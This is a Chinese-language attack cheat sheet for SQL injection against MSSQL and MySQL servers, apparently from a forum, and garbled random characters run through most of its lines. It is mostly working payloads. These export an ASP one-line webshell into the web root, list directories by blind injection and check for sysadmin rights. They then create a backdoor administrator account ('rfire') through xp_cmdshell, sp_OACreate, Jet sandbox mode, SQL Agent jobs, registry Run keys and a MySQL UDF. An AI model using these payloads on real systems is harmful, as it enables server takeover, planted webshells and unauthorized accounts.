MSSQL语句导出一句话木马
# j! B( J5 b; [7 U% F; q s首先确定网站的WEB路径
& P3 ~" j; _" b! `: S7 D- Q;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
+ ]# _) w5 j# L, _! ^
. A3 K* v, s; H' ^2 Y5 q3 P;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--
) Q( l' A% U5 h" a" D O- y//将一句话木马插入表中( b0 K ?" \ t% l$ r
9 g% z! _ N1 ?! r;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- 5 {7 {+ Y4 S1 {1 g
//导出一个ASP文件
) h; F6 `3 Q7 V/ K
! i1 e5 n( w* d( }
' C) E4 v4 `" Y2 i1 D4 J b关于MSSQL列目录
. q2 A& K$ ^( k/ w, E;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表6 v" o0 T/ A3 |6 u+ C7 t8 M6 h6 A4 B& p
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
+ u M- T2 D+ s8 N6 z5 _; ^& m+ Q; s* q8 C! y" F
and (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录
9 n: ~. G) e k8 u. X( b z6 \) ^/ G$ r G: f( _
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段8 L" E4 M) B! k- A* B( x9 K$ E
- q! k N* m) }$ b1 y% P: |
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符2 C2 M+ P/ {! W7 O/ S8 K4 p
, ^% ^4 ~# A) E% h7 j _* \- {1 i5 [8 n8 a
数据库版本和权限查看( s3 ~, |; E' k) t9 |
and 1=(select @@VERSION) //查看详细的数据库信息." C( e, O# C9 p+ t
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
5 N- ^8 j+ u9 [+ H+ n. pand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER2 \1 V( a j+ a* y( ^! a4 G3 j4 L4 ~
" S" }/ x V# x) l! U) O
0 H/ z* R N" G3 V+ y1.利用xp_cmdshell执行命令" F8 m9 q' d5 v
exec master..xp_cmdshell 'net user rfire 123456 /add'
7 S5 v! E5 @7 Y1 V% m6 X% Eexec master..xp_cmdshell 'net localgroup administrators rfire /add'* }2 U" ^9 A b$ r5 K& s7 H
\' P; W L/ }5 h
恢复xp_cmdshell存储过程
7 ?+ m' y3 p( r. Y& p2 s: ^Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
% ~+ z9 K* a" g! ?% \9 J+ E% n+ T0 ^5 }. I
0 F3 `2 i ~7 O
2.利用SP_OAcreate和SP_OAMETHOD执行命令' N2 S. \1 ]5 G* _0 G0 C: Q7 V: \
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
2 m* L5 `) S! Y7 BDECLARE @shell INT //建立一个@shell实体( `$ F. T# j! t" ~2 n
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例' U& A( G Y7 x! [/ ]2 G
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
# E! ~ g' T0 o D, ]8 V! W! Q& X6 i
9 V1 u7 Z3 a% A; W* c- q6 g/ E9 X `3 f* m, z& h" r3 l
3.利用沙盒模式
0 F- ]9 q- L' C9 q$ z9 I先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。0 M1 O$ i' S+ g* ^% X Q4 K
开启沙盒模式:' L0 J+ l/ q% R% N0 u7 m( v. V
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0# s: J: x# P3 P8 S( S
9 H* p6 ]6 o4 ]# H- r9 C- N% y8 N
执行命令:
8 j# Y% K1 w* `3 B. ~# O; RSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
# D0 q9 g& Y7 j( y3 `* {4 c2 s1 p' q2 I6 A$ |% Z* V3 Y5 c( X. L: l
* W4 U3 E& c: ]
4.利用SQL代理执行命令
6 U/ E2 {+ }) f3 h1 }! n4 Z, q. q+ rEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务7 X: ]- H$ [2 E
* y* g# {- p2 y8 O/ P* I$ Y
执行命令:
! B5 a3 T! L; p3 [- duse msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错3 z$ R2 i/ \) V k" e7 ?
exec sp_add_job 'x'6 O' U0 Y0 H( V- b3 x |7 R$ i
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业
! M1 ?) N6 T% Q/ R; M fexec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业
( H2 b1 }2 w; [! ~5 z
! c. c% q6 O8 D9 f, l0 C/ J' X% c' I: f$ ?8 C; x" _1 p
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
) u# u5 h, [+ j4 B- Z, L' X* sEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
7 A! |, K# A% g9 Y' `3 D
6 Q) T! N# R# `- U# H {; {$ D* B: g2 Y5 U. `# |1 B1 h
6.MYSQL的命令执行
: u l; S6 F7 h: pMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限) s# W, u& R' g! O' Q N0 J8 f( o
首先要在su.php下导出c:\windows\udf.dll
5 N5 O) m) ]" ~" f+ \导出后执行创建自定义函数命令:% M4 S. `5 M0 R) K! J
Create Function cmdshell returns string soname 'udf.dll'
, B" {: c, v/ `* A6 L h5 p2 }执行命令0 j* I9 {& v) f F& H! Z
select cmdshell('net user rfire 123456 /add')# H& ~- [% a: |) ?. b2 F, \% d
执行后删除函数 drop function cmdshell# n& Z* d" \4 r
|